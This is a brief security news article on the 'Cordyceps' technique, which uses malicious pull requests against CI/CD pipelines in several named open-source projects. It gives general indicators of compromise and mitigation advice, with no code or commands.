'Cordyceps' Attack Weaponizes Malicious Pull Requests Against Developer Workflows

Security researchers have identified a new attack vector dubbed 'Cordyceps' that exploits CI/CD workflow weaknesses through malicious pull requests. The technique targets multiple high-profile projects including Microsoft's Azure Sentinel, Google's AI Agent Development Kit, Apache's Doris analytics database, Cloudflare's Workers SDK, and the Python Software Foundation's Black formatter.

The attack carries significant severity due to the widespread use of these affected tools and frameworks. While no CVSS score or exact number of compromised systems has been disclosed, the methodology preys on the trust inherent in collaborative development workflows, making it particularly dangerous for open-source ecosystems.

Cordyceps operates by submitting pull requests that appear legitimate but contain hidden malicious code. The exploit leverages automation in CI/CD pipelines that may automatically merge or test incoming contributions without thorough review. Indicators of compromise include unexpected code modifications in pull requests or altered build artifacts.

Currently, no specific patches have been released for the underlying vulnerability. Mitigation relies on implementing stricter code review processes, requiring multi-factor authentication for pull request approvals, and deploying automated scanning tools to detect anomalous code changes before merge.

The attack draws its name from the parasitic fungus that controls its host, reflecting how malicious code can hijack trusted development workflows. This technique highlights growing risks in software supply chain security where developer trust is exploited.